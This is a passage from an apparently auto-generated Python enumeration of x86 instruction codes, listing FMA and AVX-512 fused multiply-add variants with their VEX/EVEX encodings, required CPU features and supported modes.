``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3435
"""
``VFMADDSUB213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 A6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3436
"""
``VFMADDSUB213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 A6 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3437
"""
``VFMADDSUB213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 A6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3438
"""
``VFMADDSUB213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 A6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3439
"""
``VFMADDSUB213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 A6 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUBADD213PS_XMM_XMM_XMMM128: int = 3440
"""
``VFMSUBADD213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 A7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD213PS_YMM_YMM_YMMM256: int = 3441
"""
``VFMSUBADD213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 A7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD213PD_XMM_XMM_XMMM128: int = 3442
"""
``VFMSUBADD213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 A7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD213PD_YMM_YMM_YMMM256: int = 3443
"""
``VFMSUBADD213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 A7 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3444
"""
``VFMSUBADD213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 A7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3445
"""
``VFMSUBADD213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 A7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3446
"""
``VFMSUBADD213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 A7 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3447
"""
``VFMSUBADD213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 A7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3448
"""
``VFMSUBADD213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 A7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3449
"""
``VFMSUBADD213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 A7 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD213PS_XMM_XMM_XMMM128: int = 3450
"""
``VFMADD213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 A8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD213PS_YMM_YMM_YMMM256: int = 3451
"""
``VFMADD213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 A8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD213PD_XMM_XMM_XMMM128: int = 3452
"""
``VFMADD213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 A8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD213PD_YMM_YMM_YMMM256: int = 3453
"""
``VFMADD213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 A8 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3454
"""
``VFMADD213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 A8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3455
"""
``VFMADD213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 A8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3456
"""
``VFMADD213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 A8 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3457
"""
``VFMADD213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 A8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3458
"""
``VFMADD213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 A8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3459
"""
``VFMADD213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 A8 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD213SS_XMM_XMM_XMMM32: int = 3460
"""
``VFMADD213SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 A9 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD213SD_XMM_XMM_XMMM64: int = 3461
"""
``VFMADD213SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 A9 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3462
"""
``VFMADD213SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 A9 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3463
"""
``VFMADD213SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 A9 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUB213PS_XMM_XMM_XMMM128: int = 3464
"""
``VFMSUB213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 AA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB213PS_YMM_YMM_YMMM256: int = 3465
"""
``VFMSUB213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 AA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB213PD_XMM_XMM_XMMM128: int = 3466
"""
``VFMSUB213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 AA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB213PD_YMM_YMM_YMMM256: int = 3467
"""
``VFMSUB213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 AA /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3468
"""
``VFMSUB213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 AA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3469
"""
``VFMSUB213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 AA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3470
"""
``VFMSUB213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 AA /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3471
"""
``VFMSUB213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 AA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3472
"""
``VFMSUB213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 AA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3473
"""
``VFMSUB213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 AA /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_V4FNMADDPS_ZMM_K1Z_ZMMP3_M128: int = 3474
"""
``V4FNMADDPS zmm1 {k1}{z}, zmm2+3, m128``
``EVEX.512.F2.0F38.W0 AA /r``
``AVX512_4FMAPS``
``16/32/64-bit``
"""
VEX_VFMSUB213SS_XMM_XMM_XMMM32: int = 3475
"""
``VFMSUB213SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 AB /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB213SD_XMM_XMM_XMMM64: int = 3476
"""
``VFMSUB213SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 AB /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3477
"""
``VFMSUB213SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 AB /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3478
"""
``VFMSUB213SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 AB /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_V4FNMADDSS_XMM_K1Z_XMMP3_M128: int = 3479
"""
``V4FNMADDSS xmm1 {k1}{z}, xmm2+3, m128``
``EVEX.LIG.F2.0F38.W0 AB /r``
``AVX512_4FMAPS``
``16/32/64-bit``
"""
VEX_VFNMADD213PS_XMM_XMM_XMMM128: int = 3480
"""
``VFNMADD213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 AC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD213PS_YMM_YMM_YMMM256: int = 3481
"""
``VFNMADD213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 AC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD213PD_XMM_XMM_XMMM128: int = 3482
"""
``VFNMADD213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 AC /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD213PD_YMM_YMM_YMMM256: int = 3483
"""
``VFNMADD213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 AC /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3484
"""
``VFNMADD213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 AC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3485
"""
``VFNMADD213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 AC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3486
"""
``VFNMADD213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 AC /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3487
"""
``VFNMADD213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 AC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3488
"""
``VFNMADD213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 AC /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3489
"""
``VFNMADD213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 AC /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMADD213SS_XMM_XMM_XMMM32: int = 3490
"""
``VFNMADD213SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 AD /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD213SD_XMM_XMM_XMMM64: int = 3491
"""
``VFNMADD213SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 AD /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3492
"""
``VFNMADD213SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 AD /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3493
"""
``VFNMADD213SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 AD /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB213PS_XMM_XMM_XMMM128: int = 3494
"""
``VFNMSUB213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 AE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB213PS_YMM_YMM_YMMM256: int = 3495
"""
``VFNMSUB213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 AE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB213PD_XMM_XMM_XMMM128: int = 3496
"""
``VFNMSUB213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 AE /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB213PD_YMM_YMM_YMMM256: int = 3497
"""
``VFNMSUB213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 AE /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3498
"""
``VFNMSUB213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 AE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3499
"""
``VFNMSUB213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 AE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3500
"""
``VFNMSUB213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 AE /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3501
"""
``VFNMSUB213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 AE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3502
"""
``VFNMSUB213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 AE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3503
"""
``VFNMSUB213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 AE /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB213SS_XMM_XMM_XMMM32: int = 3504
"""
``VFNMSUB213SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 AF /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB213SD_XMM_XMM_XMMM64: int = 3505
"""
``VFNMSUB213SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 AF /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3506
"""
``VFNMSUB213SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 AF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3507
"""
``VFNMSUB213SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 AF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMADD52LUQ_XMM_K1Z_XMM_XMMM128B64: int = 3508
"""
``VPMADD52LUQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 B4 /r``
``AVX512VL and AVX512_IFMA``
``16/32/64-bit``
"""
EVEX_VPMADD52LUQ_YMM_K1Z_YMM_YMMM256B64: int = 3509
"""
``VPMADD52LUQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 B4 /r``
``AVX512VL and AVX512_IFMA``
``16/32/64-bit``
"""
EVEX_VPMADD52LUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3510
"""
``VPMADD52LUQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 B4 /r``
``AVX512_IFMA``
``16/32/64-bit``
"""
EVEX_VPMADD52HUQ_XMM_K1Z_XMM_XMMM128B64: int = 3511
"""
``VPMADD52HUQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 B5 /r``
``AVX512VL and AVX512_IFMA``
``16/32/64-bit``
"""
EVEX_VPMADD52HUQ_YMM_K1Z_YMM_YMMM256B64: int = 3512
"""
``VPMADD52HUQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 B5 /r``
``AVX512VL and AVX512_IFMA``
``16/32/64-bit``
"""
EVEX_VPMADD52HUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3513
"""
``VPMADD52HUQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 B5 /r``
``AVX512_IFMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB231PS_XMM_XMM_XMMM128: int = 3514
"""
``VFMADDSUB231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 B6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB231PS_YMM_YMM_YMMM256: int = 3515
"""
``VFMADDSUB231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 B6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB231PD_XMM_XMM_XMMM128: int = 3516
"""
``VFMADDSUB231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 B6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB231PD_YMM_YMM_YMMM256: int = 3517
"""
``VFMADDSUB231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 B6 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3518
"""
``VFMADDSUB231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 B6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3519
"""
``VFMADDSUB231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 B6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3520
"""
``VFMADDSUB231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 B6 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3521
"""
``VFMADDSUB231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 B6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3522
"""
``VFMADDSUB231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 B6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3523
"""
``VFMADDSUB231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 B6 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUBADD231PS_XMM_XMM_XMMM128: int = 3524
"""
``VFMSUBADD231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 B7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD231PS_YMM_YMM_YMMM256: int = 3525
"""
``VFMSUBADD231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 B7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD231PD_XMM_XMM_XMMM128: int = 3526
"""
``VFMSUBADD231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 B7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD231PD_YMM_YMM_YMMM256: int = 3527
"""
``VFMSUBADD231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 B7 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3528
"""
``VFMSUBADD231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 B7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3529
"""
``VFMSUBADD231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 B7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3530
"""
``VFMSUBADD231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 B7 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3531
"""
``VFMSUBADD231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 B7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3532
"""
``VFMSUBADD231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 B7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3533
"""
``VFMSUBADD231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 B7 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD231PS_XMM_XMM_XMMM128: int = 3534
"""
``VFMADD231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 B8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD231PS_YMM_YMM_YMMM256: int = 3535
"""
``VFMADD231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 B8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD231PD_XMM_XMM_XMMM128: int = 3536
"""
``VFMADD231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 B8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD231PD_YMM_YMM_YMMM256: int = 3537
"""
``VFMADD231PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 B8 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3538
"""
``VFMADD231PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 B8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3539
"""
``VFMADD231PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 B8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3540
"""
``VFMADD231PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 B8 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3541
"""
``VFMADD231PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 B8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3542
"""
``VFMADD231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 B8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3543
"""
``VFMADD231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 B8 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD231SS_XMM_XMM_XMMM32: int = 3544
"""
``VFMADD231SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 B9 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD231SD_XMM_XMM_XMMM64: int = 3545
"""
``VFMADD231SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 B9 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3546
"""
``VFMADD231SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 B9 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3547
"""
``VFMADD231SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 B9 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUB231PS_XMM_XMM_XMMM128: int = 3548
"""
``VFMSUB231PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 BA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB231PS_YMM_YMM_YMMM256: int = 3549
"""
``VFMSUB231PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 BA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB231PD_XMM_XMM_XMMM128: int = 3550
"""
``VFMSUB231PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 BA /r``
``FMA``
